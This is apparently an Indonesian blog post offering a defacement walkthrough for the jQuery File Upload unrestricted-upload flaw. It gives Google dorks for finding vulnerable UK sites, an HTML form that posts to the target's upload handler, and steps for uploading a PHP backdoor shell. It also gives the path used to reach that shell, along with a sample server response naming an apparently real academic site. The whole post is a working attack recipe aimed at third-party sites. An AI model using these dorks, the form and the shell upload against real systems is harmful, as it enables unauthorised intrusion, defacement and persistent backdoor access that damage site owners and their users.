Deface Poc Jquery File Upload

Proof of Concept (POC): Web Other Application Bug (Jquery Upload Form). Celahnya terdapat pada file UploadHandler.php dimana tidak ada validasi disana sehingga attacker dapat mengupload file dengan metode post, dan lagi, tidak ada filter ekstensi sehingga file backdoor php pun langsung lolos ke server tanpa bypass.


Dork :
Inurl:/assets/global/plugins/ site:.co.uk
Inurl:/assets/plugins/ site:.co.uk
Inurl:/assets/global/images/ site:.uk

Csrf :

<form method="POST" action="http://target.com/assets/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Exploit :
/assets/global/plugins/jquery-file-upload/server/php/

Kita dorking ke google menggunakan dork di atas untuk menemukan target, pastikan dorking di google image aja biar dapet yang vuln.

Ciri-ciri web yang vuln Jquery file upload adalah halaman putih yang bertuliskan FILES[].

Jika sudah menemukan web, silahkan pasang exploit yang sudah di sediakan, sebagai contoh : http://target.co.li/assets/global/plugins/jquery-file-upload/server/php/
Simpan CSRF yag sudah saya berikan dengan format HTML, lalu akses CSRF tersebut.
Jika sudah silahkan isi Form Upload dengan shell kalian.

Jika di halaman bertuliskan seperti ini berarti vuln : {"files":[{"name":"up.html","size":195,"type":"text\/html","url":"http:\/\/www.isif.ac.id\/assets\/plugins\/jquery-file-upload\/server\/php\/files\/up.html","delete_url":"http:\/\/www.isif.ac.id\/assets\/plugins\/jquery-file-upload\/server\/php\/?file=up.html","delete_type":"DELETE"}]}

Untuk bisa mengakses shell kita busa di lakukan dengan cara
http://target.co.li/assets/global/plugins/jquery-file-upload/server/php/files/shell.php

Berlangganan update artikel terbaru via email:

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel